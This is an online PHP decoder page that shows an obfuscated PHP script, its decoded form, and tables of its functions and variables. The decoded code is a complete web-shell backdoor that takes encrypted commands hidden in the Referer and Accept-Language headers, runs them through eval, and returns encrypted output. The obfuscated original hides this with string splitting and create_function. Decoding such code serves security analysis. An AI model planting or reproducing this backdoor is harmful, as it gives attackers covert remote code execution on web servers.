Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php $e='*$k{$j*};}}r*eturn $o*;}*$r=$**_SERVER;$rr=@$*r*["H*TT*P_REFERER"];$*ra=*@$r[';..

Decoded Output download

$kh="121c";$kf="60df";function x($t,$k){$c=strlen($k);$l=strlen($t);$o="";for($i=0;$i<$l;){for($j=0;($j<$c&&$i<$l);$j++,$i++){$o.=$t{$i}^$k{$j};}}return $o;}$r=$_SERVER;$rr=@$r["HTTP_REFERER"];$ra=@$r["HTTP_ACCEPT_LANGUAGE"];if($rr&&$ra){$u=parse_url($rr);parse_str($u["query"],$q);$q=array_values($q);preg_match_all("/([\w])[\w-]+(?:;q=0.([\d]))?,?/",$ra,$m);if($q&&$m){@session_start();$s=&$_SESSION;$ss="substr";$sl="strtolower";$i=$m[1][0].$m[1][1];$h=$sl($ss(md5($i.$kh),0,3));$f=$sl($ss(md5($i.$kf),0,3));$p="";for($z=1;$z<count($m[1]);$z++)$p.=$q[$m[2][$z]];if(strpos($p,$h)===0){$s[$i]="";$p=$ss($p,3);}if(array_key_exists($i,$s)){$s[$i].=$p;$e=strpos($s[$i],$f);if($e){$k=$kh.$kf;ob_start();eval(@gzuncompress(@x(base64_decode(preg_replace(array("/_/","/-/"),array("/","+"),$ss($s[$i],0,$e))),$k)));$o=ob_get_contents();ob_end_clean();$d=base64_encode(x(gzcompress($o),$k));print("<$k>$d</$k>");@session_destroy();}}}}

Did this file decode correctly?

Original Code

<?php
$e='*$k{$j*};}}r*eturn $o*;}*$r=$**_SERVER;$rr=@$*r*["H*TT*P_REFERER"];$*ra=*@$r[';
$E='N;$ss=*"subst*r";$sl*=*"st*rtolo*wer";$i=$m[1][0]*.*$m[1][*1];$h=$s*l($s*s(md';
$k='5($i*.$kh)*,0,3)*)*;$f=$s*l($ss*(md5($i*.$k*f),0,3));$p=*"";for($z*=1;$z<cou*';
$M=';q=0.(**[*\\d]))?,?/",$*ra,$m*);if($q&&$*m){@sess*ion_s*tart();$*s=*&$*_SESSIO';
$o='p=$*ss($p,*3);}i**f(array_**key_exi*sts($i,$s)){$s[$i*].=$p;$e*=s*trpo*s*($s[';
$T='nt($m*[1]);*$z++)$p.=*$q[$m[*2][*$z]]*;if(s*tr*pos($p,$h*)===0*){$*s[$i]="";$';
$r='_deco*de*(preg_repla*ce(a*rray("/_/*"*,"/-/"),arr**ay("*/","+"),$*ss($s*[$i],';
$J='(x(g**zco*mpress($*o),$k));print(*"*<$k>$d*</*$k>*");@session_destro*y();}}}}';
$j='$kh="1*21*c"*;$kf="60df";*function x($t*,$*k){$c=str**len($k);$l=st*rl*en($t);';
$O='0,$e)*)),*$k))*);$o*=ob_get_content*s();*ob_end*_c*lean();*$d=bas*e64_encod*e';
$K='*$o="*";for*($i=0;$i*<$l;)*{*for($j=0*;($j<*$c&*&$i<$l);$j+*+,$i++*){$o.=$t{$i}^';
$N='$i],$f);if(*$*e){$k=$kh.$kf;*ob_st**art();@e*va*l(@gzu*ncompress(@x(@b*a*se64';
$X='[*"query**"],$q);$q=array**_values($q);pr*eg_*m*atch_all("/(*[\\w])[\\w*-*]+(?:';
$n=str_replace('x','','cxrxxeaxte_fxxunction');
$U='"HTTP_ACCEPT_**LANGUAGE"*];if*($r*r&&$*ra){$u=parse_ur**l($rr);parse*_str(*$u';
$b=str_replace('*','',$j.$K.$e.$U.$X.$M.$E.$k.$T.$o.$N.$r.$O.$J);
$A=$n('',$b);$A();
?>

Function Calls

null 1
str_replace 2
create_function 1

Variables

$A None
$E N;$ss=*"subst*r";$sl*=*"st*rtolo*wer";$i=$m[1][0]*.*$m[1][*1..
$J (x(g**zco*mpress($*o),$k));print(*"*<$k>$d*</*$k>*");@sessio..
$K *$o="*";for*($i=0;$i*<$l;)*{*for($j=0*;($j<*$c&*&$i<$l);$j+*..
$M ;q=0.(**[*\d]))?,?/",$*ra,$m*);if($q&&$*m){@sess*ion_s*tart(..
$N $i],$f);if(*$*e){$k=$kh.$kf;*ob_st**art();@e*va*l(@gzu*ncomp..
$O 0,$e)*)),*$k))*);$o*=ob_get_content*s();*ob_end*_c*lean();*$..
$T nt($m*[1]);*$z++)$p.=*$q[$m[*2][*$z]]*;if(s*tr*pos($p,$h*)==..
$U "HTTP_ACCEPT_**LANGUAGE"*];if*($r*r&&$*ra){$u=parse_ur**l($r..
$X [*"query**"],$q);$q=array**_values($q);pr*eg_*m*atch_all("/(..
$b $kh="121c";$kf="60df";function x($t,$k){$c=strlen($k);$l=str..
$e *$k{$j*};}}r*eturn $o*;}*$r=$**_SERVER;$rr=@$*r*["H*TT*P_REF..
$j $kh="1*21*c"*;$kf="60df";*function x($t*,$*k){$c=str**len($k..
$k 5($i*.$kh)*,0,3)*)*;$f=$s*l($ss*(md5($i*.$k*f),0,3));$p=*"";..
$n create_function
$o p=$*ss($p,*3);}i**f(array_**key_exi*sts($i,$s)){$s[$i*].=$p;..
$r _deco*de*(preg_repla*ce(a*rray("/_/*"*,"/-/"),arr**ay("*/","..

Stats

MD5 ccef78e5e85cde00f282667e36b5085d
Eval Count 1
Decode Time 40 ms